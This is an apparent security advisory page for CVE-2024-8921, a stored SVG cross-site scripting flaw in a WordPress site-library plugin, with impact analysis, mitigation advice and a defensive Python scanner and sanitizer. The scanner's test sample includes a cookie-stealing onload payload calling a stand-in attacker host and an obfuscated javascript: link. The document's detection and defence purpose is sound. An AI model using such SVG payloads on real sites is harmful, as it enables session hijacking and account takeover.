CVE-2024-8921: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in wpzita Zita Elementor Site Library
CVE-2024-8921 is a stored cross-site scripting (XSS) vulnerability in the Zita Elementor Site Library WordPress plugin affecting all versions up to and including 1.6.3. Authenticated users with Author-level or higher privileges can upload SVG files containing embedded script, and that script executes in the browser of any user who later opens the uploaded file. The root cause is missing sanitization of SVG uploads combined with missing output escaping. The CVSS vector rates the attack as needing no user interaction on the attacker's side, but it does require an authenticated account with Author or higher privileges, and the payload only fires once a victim loads the SVG. The impact is a partial compromise of confidentiality and integrity: arbitrary script runs in the origin of the affected site. No public exploit is reported and no vendor patch link is available at the time of writing. Sites using this plugin should restrict who holds Author-level access and monitor for suspicious SVG uploads while awaiting a vendor fix.
AI Analysis
Technical Summary
CVE-2024-8921 is a medium-severity stored cross-site scripting vulnerability in the Zita Elementor Site Library plugin for WordPress, affecting all versions up to and including 1.6.3. The plugin does not sanitize SVG files on upload or escape them on output, so an authenticated user with Author-level or higher privileges can upload an SVG carrying JavaScript (a <script> element, an on* event-handler attribute such as onload, or a javascript: href). When another user or an administrator loads that SVG, the script runs in their browser within the site's origin, which can be used for session hijacking, actions performed with the victim's privileges (including creating or elevating accounts if the victim is an administrator), or content modification. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The CVSS v3.1 base score is 6.4: network attack vector, low attack complexity, privileges required, no user interaction, partial impact on confidentiality and integrity, and no impact on availability. The scope is rated as changed because the injected script executes in the victim's browser under the WordPress site's origin rather than inside the plugin itself. No public exploits have been reported and no official patch has been linked at the time of publication. The requirement for an Author-level or higher account limits exposure, but the risk remains significant on multi-user sites where authors routinely upload media. One caveat matters for triage: browsers do not execute script inside an SVG referenced through an <img> element or a CSS background image, so the payload is triggered when a victim navigates to the uploaded file directly (its URL under the uploads directory) or when it is embedded as a document through <iframe>, <object> or <embed>. The injection is persistent, because the file stays in the media library and fires on every such load.
Potential Impact
The primary impact of CVE-2024-8921 is execution of attacker-controlled script in the context of the vulnerable WordPress site, which compromises the confidentiality and integrity of user sessions and site content. An attacker with Author-level access can upload an SVG whose script runs for any user who opens it, enabling session hijacking, unauthorized content modification, or privilege escalation if the victim holds a higher role. Availability is not directly affected, but the loss of trust and the foothold for further compromise can disrupt normal operations. Sites running the Zita Elementor Site Library plugin are at risk of targeted attacks, especially those with multiple authors or contributors, and the issue can be combined with social engineering (for example, sending an administrator a link to the uploaded file) to compromise administrative accounts or inject malware. Given WordPress's wide deployment, many sites may be affected, particularly those that let several authenticated users upload media. Although no exploits are known in the wild, the absence of a patch means mitigation cannot wait for a vendor fix.
Mitigation Recommendations
To mitigate CVE-2024-8921, restrict upload permissions to trusted users and, where SVG is not required, disable SVG uploads entirely. WordPress core rejects SVG uploads by default, so the upload path at issue is one enabled by the plugin; removing that capability restores the default posture. Apply strict role-based access control so that only highly trusted users hold Author-level or higher privileges, and audit roles regularly. A web application firewall can block obvious payloads in uploads, but SVG is XML, so a WAF that matches on the literal string "<script" will miss payloads hidden behind character references or event-handler attributes; scan the media library for SVG files containing script elements, on* attributes or javascript: hrefs, and sanitize or remove them. Until an official patch is released, consider disabling the plugin if its SVG upload functionality is not critical, and tell content creators and administrators not to open untrusted SVG files directly. Keep WordPress core and all plugins updated. Finally, Content Security Policy helps only if it is applied to the response that serves the SVG itself: a CSP header on the site's HTML pages does not govern a directly opened file under the uploads directory, so configure the web server to send a restrictive policy (or a Content-Disposition: attachment header, which forces a download instead of rendering) for SVG files in that directory.
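The scanner below is an added example, not code from the plugin, from Wordfence or from this page. It shows what the script-bearing SVG described in the technical summary looks like and implements the "scan uploads for embedded scripts" step of the mitigation advice: each SVG is parsed as XML so that character references such as &#x09; inside a javascript: URL are decoded before the checks run, the same way a browser decodes them. The directory layout (wp-content/uploads) and the two sample files are constructed for the example; the detection rules are generic.

```python
"""Offline scanner for script-bearing SVG uploads (added example; not plugin or Wordfence code)."""
import os
import re
import sys
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # keep the output readable when re-serialising
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute or embed active content when the SVG is opened as a document.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# href values that run code or load a nested active document (checked after whitespace removal).
ACTIVE_URL = re.compile(r"^(?:javascript|vbscript):|^data:(?:text/html|image/svg\+xml)", re.I)


def local_name(qualified):
    """'{http://www.w3.org/2000/svg}script' -> 'script'; plain names pass through."""
    return qualified.rsplit("}", 1)[-1].lower()


def is_active_href(value):
    # Browsers ignore tabs/newlines inside a URL scheme, so 'java\tscript:' still runs.
    return ACTIVE_URL.match(re.sub(r"\s", "", value)) is not None


def find_active_content(svg_bytes):
    """Return [(element, reason), ...]; an empty list means nothing script-capable was found."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [("document", f"not well-formed XML: {exc}")]
    findings = []
    for elem in root.iter():
        name = local_name(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append((name, "script-capable element"))
        for attr, value in elem.attrib.items():
            aname = local_name(attr)
            if aname.startswith("on"):                     # onload, onclick, onbegin, ...
                findings.append((name, f"event handler attribute {aname}"))
            elif aname == "href" and is_active_href(value):
                findings.append((name, f"active href {value.strip()[:40]!r}"))
    return findings


def sanitize(svg_bytes):
    """Strip active elements and attributes; returns serialised SVG bytes."""
    root = ET.fromstring(svg_bytes)
    parents = {child: parent for parent in root.iter() for child in parent}
    for elem in list(root.iter()):
        if local_name(elem.tag) in ACTIVE_ELEMENTS:
            parent = parents.get(elem)
            if parent is not None:
                parent.remove(elem)
            continue
        for attr in list(elem.attrib):
            aname = local_name(attr)
            if aname.startswith("on") or (aname == "href" and is_active_href(elem.attrib[attr])):
                del elem.attrib[attr]
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def scan_directory(top):
    """Map each *.svg under `top` (e.g. wp-content/uploads) to its findings; clean files are omitted."""
    report = {}
    for dirpath, _dirs, files in os.walk(top):
        for fname in files:
            if fname.lower().endswith(".svg"):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    findings = find_active_content(fh.read())
                if findings:
                    report[path] = findings
    return report


# Constructed samples standing in for uploaded files; they are not a real exploit from the CVE.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="10" height="10">
  <rect width="10" height="10" fill="red" onload="fetch('https://attacker.invalid/?c='+document.cookie)"/>
  <a xlink:href="java&#x09;script:alert(document.domain)"><text y="8">x</text></a>
  <script>alert(document.domain)</script>
</svg>"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:                   # e.g. python svg_scan.py /var/www/html/wp-content/uploads
        for path, findings in scan_directory(sys.argv[1]).items():
            print(path, findings)
    else:
        print("malicious:", find_active_content(MALICIOUS_SVG))
        print("benign:   ", find_active_content(BENIGN_SVG))
        print("cleaned:  ", find_active_content(sanitize(MALICIOUS_SVG)))
```

Run it against the uploads directory to get a list of files to review; the sanitize function is for quarantining a file you must keep, not a replacement for the vendor fix, because it removes known-active constructs rather than allow-listing safe ones. A file that is not well-formed XML is reported as a finding on purpose: a browser may still render it leniently, so it deserves a manual look.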
Affected Countries
United States, Germany, United Kingdom, Canada, Australia, France, Netherlands, India, Brazil, Japan
Technical Details
- Data Version: 5.1
- Assigner Short Name: Wordfence
- Date Reserved: 2024-09-16T22:52:56.334Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 699f6b3ab7ef31ef0b54f7ef
Added to database: 2/25/2026, 9:35:54 PM
Last enriched: 2/25/2026, 10:55:21 PM
Last updated: 2/26/2026, 8:07:08 AM